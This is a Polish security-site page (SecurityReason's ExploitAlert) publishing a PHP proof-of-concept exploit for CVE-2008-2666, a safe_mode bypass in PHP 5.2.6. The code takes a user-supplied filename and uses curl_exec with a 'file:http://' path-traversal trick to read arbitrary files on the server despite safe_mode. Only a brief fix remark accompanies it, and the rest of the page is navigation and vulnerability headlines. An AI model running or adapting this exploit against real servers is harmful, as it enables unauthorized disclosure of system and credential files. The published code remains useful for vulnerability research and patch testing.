Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
Wiadomości IT
Dodaj wiadomość
Szukaj
Baza SecurityAlert
O SecurityAlert
Baza ExploitAlert
Badania SecurityReason
WLB
Baza WLB
Dodaj Note WLB
O WLB
Audyt
Informacje
Harmonogram
Cena
Referencje
Kontakt
RSS
Wiadomości
SecurityAlert
ExploitAlert
Apache
PHP
WLB
Zespół
Kontakt
Informacje o firmie
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl
Kategoria : SecurityReason Exploit

  Tytuł : PHP 5.2.6 safe_mode bypass
  ExploitAlert : 10
  Autor : Maksymilian Arciemowicz
  Data : 29.06.2008

  Ściągnij ten Exploit

  Wersja tekstowa

  Kod :  

<?php
/*
Exploit for CVE-2008-2666:
http://securityreason.com/achievement_securityalert/55

Orginal URL
http://securityreason.com/achievement_exploitalert/10

safe_mode Bypass PHP 5.2.6
by Maksymilian Arciemowicz http://securityreason.com
cxib [at] securityreason [dot] com

How to fix?
Do not use safe_mode as a main safety
*/

eCHo "<PRE><P>This is exploit from <a
href=\"http://securityreason.com\">http://securityreason.com</a>
Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode
bypass<p>More: <a
href=\"http://securityreason.com/news/0/0x24\">http://securityreason.com/ne
ws/0/0x24</a><p><form name=\"form\"
action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N
AME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\"
value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\"
value=\"Show\"></form>\n";

if(!IS_dir(dirname(__FILE__)."/http:")){ // can work without this
requirement
if(!IS_writable(dirname(__FILE__))) die("<b>I can't create http:
directory</b>");
mkDIR("http:");
}

if(Empty($file) aNd Empty($_GET['file']) aNd Empty($_POST['file']))
diE("\n".$karatonik);

if(!empty($_GET['file'])) $file=$_GET['file'];
if(!empty($_POST['file'])) $file=$_POST['file'];


if((curl_exec(curl_init("file:http://../../../../../../../../../../../../..
/../../../../../../../../../../../../../../../../../../../../".$file))) aNd
!emptY($file)) die("<B><br>best regards cxib from
securityreason.com</B></FONT>");
elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have
permissions.</CENTER></FONT>");

?>
Apache rss
» 
Apache HTTP Server Denial
   of Service Vulnerability
» 
Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)
» 
Apache Continuum
   cross-site scripting
   vulnerability
» 
Apache Tomcat DoS
   Vulnerability
PHP rss
» 
PHP Hashtables Denial of
   Service
» 
PHP 5.3.6 multiple null
   pointer dereference
» 
PHP 5.3.6 ZipArchive
   invalid use glob(3)
» 
libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain
Copyright © SecurityReason. All Rights Reserved.